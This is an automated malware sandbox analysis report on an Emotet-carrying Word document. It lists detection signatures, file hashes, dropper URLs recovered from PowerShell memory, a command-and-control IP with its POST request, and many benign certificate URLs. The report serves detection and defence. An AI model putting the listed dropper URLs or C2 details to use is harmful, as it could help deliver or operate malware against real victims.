Analysis Report N00048481397007.doc

Overview

General Information

Sample Name: N00048481397007.doc
Analysis ID: 343979
MD5: ad7db0f946bc5c3bb051cb04f359e6a4
SHA1: 24d54a6a1c4280b948fb245c97e4823d319eefe1
SHA256: 4fc6cbe4fae599ca6ab094dc1115909a687754f49a3ff31671ae4fbc7b3296d1

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://nightlifemumbai.club/x/0wBD3/ Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev/wp-includes/RlMObf2j0/ Avira URL Cloud: Label: malware
Source: https://jflmktg.wpcomstaging.com/wp-content/AK/ Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev Avira URL Cloud: Label: malware
Machine Learning detection for dropped file
Source: C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll Joe Sandbox ML: detected

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49169 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2327249466.0000000002A60000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: nightlifemumbai.club
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.88.166:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.217.6.174:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49171 -> 190.55.186.229:80
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp String found in memory: http://nightlifemumbai.club/x/0wBD3/!https://shop.nowfal.dev/wp-includes/RlMObf2j0/!http://e-wdesign.eu/wp-content/bn1IgDejh/!http://traumfrauen-ukraine.de/bin/JyeS/!https://jflmktg.wpcomstaging.com/wp-content/AK/!https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp String found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp String found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp String found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp String found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp String found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp String found in memory: Do you want to switch to it now?
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp String found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp String found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp String found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 212.227.200.73 212.227.200.73
Source: Joe Sandbox View IP Address: 190.55.186.229 190.55.186.229
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /pvaadnb3/ HTTP/1.1DNT: 0Referer: 190.55.186.229/pvaadnb3/Content-Type: multipart/form-data; boundary=------------JavqSYlmrOTCUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.55.186.229Content-Length: 5508Connection: Keep-AliveCache-Control: no-cache
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24864F20-30CA-4646-ACFF-79FC9E14ADCB}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: nightlifemumbai.club
Source: unknown HTTP traffic detected: POST /pvaadnb3/ HTTP/1.1DNT: 0Referer: 190.55.186.229/pvaadnb3/Content-Type: multipart/form-data; boundary=------------JavqSYlmrOTCUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.55.186.229Content-Length: 5508Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1569Date: Mon, 25 Jan 2021 19:10:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: powershell.exe, 00000005.00000003.2325890478.000000001D051000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: powershell.exe, 00000005.00000003.2325890478.000000001D051000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000005.00000002.2326597229.0000000001ECE000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/EncryptionEverywhereDVTLSCA-G1.crt0
Source: powershell.exe, 00000005.00000003.2326018353.000000001CFE9000.00000004.00000001.sdmp String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: powershell.exe, 00000005.00000002.2334453493.000000001CFB8000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000005.00000002.2334750882.000000001D05F000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000005.00000002.2326644631.0000000001F69000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0L
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: powershell.exe, 00000005.00000002.2326330204.00000000001B2000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabT6_v
Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp String found in binary or memory: http://e-wdesign.eu
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp String found in binary or memory: http://e-wdesign.eu/wp-content/bn1IgDejh/
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2331489213.0000000003B6A000.00000004.00000001.sdmp String found in binary or memory: http://nightlifemumbai.club
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp String found in binary or memory: http://nightlifemumbai.club/x/0wBD3/
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0B
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0J
